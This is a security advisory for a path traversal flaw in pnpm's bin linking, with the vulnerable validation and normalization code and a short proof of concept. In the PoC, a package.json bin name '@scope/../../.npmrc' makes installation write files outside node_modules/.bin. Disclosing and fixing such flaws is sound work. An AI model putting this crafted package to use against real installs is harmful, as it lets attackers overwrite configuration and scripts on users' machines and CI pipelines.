CVE-2026-23890
MEDIUM6.5EPSS 0.02%pnpm scoped bin name Path Traversal allows arbitrary file creation outside node_modules/.bin
Description
### Summary A path traversal vulnerability in pnpm's bin linking allows malicious npm packages to create executable shims or symlinks outside of `node_modules/.bin`. Bin names starting with `@` bypass validation, and after scope normalization, path traversal sequences like `../../` remain intact. ### Details The vulnerability exists in the bin name validation and normalization logic: **1. Validation Bypass (`pkg-manager/package-bins/src/index.ts`)** The filter allows any bin name starting with `@` to pass through without validation: ```typescript .filter((commandName) => encodeURIComponent(commandName) === commandName || commandName === '' || commandName[0] === '@' // <-- Bypasses validation ) ``` **2. Incomplete Normalization (`pkg-manager/package-bins/src/index.ts`)** ```typescript function normalizeBinName (name: string): string { return name[0] === '@' ? name.slice(name.indexOf('/') + 1) : name } // Input: @scope/../../evil // Output: ../../evil <-- Path traversal preserved! ``` **3. Exploitation (`pkg-manager/link-bins/src/index.ts:288`)** The normalized name is used directly in `path.join()` without validation. ### PoC 1. Create a malicious package: ```json { "name": "malicious-pkg", "version": "1.0.0", "bin": { "@scope/../../.npmrc": "./malicious.js" } } ``` 2. Install the package: ```bash pnpm add /path/to/malicious-pkg ``` 3. Observe `.npmrc` created in project root (outside node_modules/.bin). ### Impact - All pnpm users who install npm packages - CI/CD pipelines using pnpm - Can overwrite config files, scripts, or other sensitive files Verified on pnpm main @ commit 5a0ed1d45.
Affected packages (1)
- npm/pnpmfrom 0, < 10.28.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM6.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |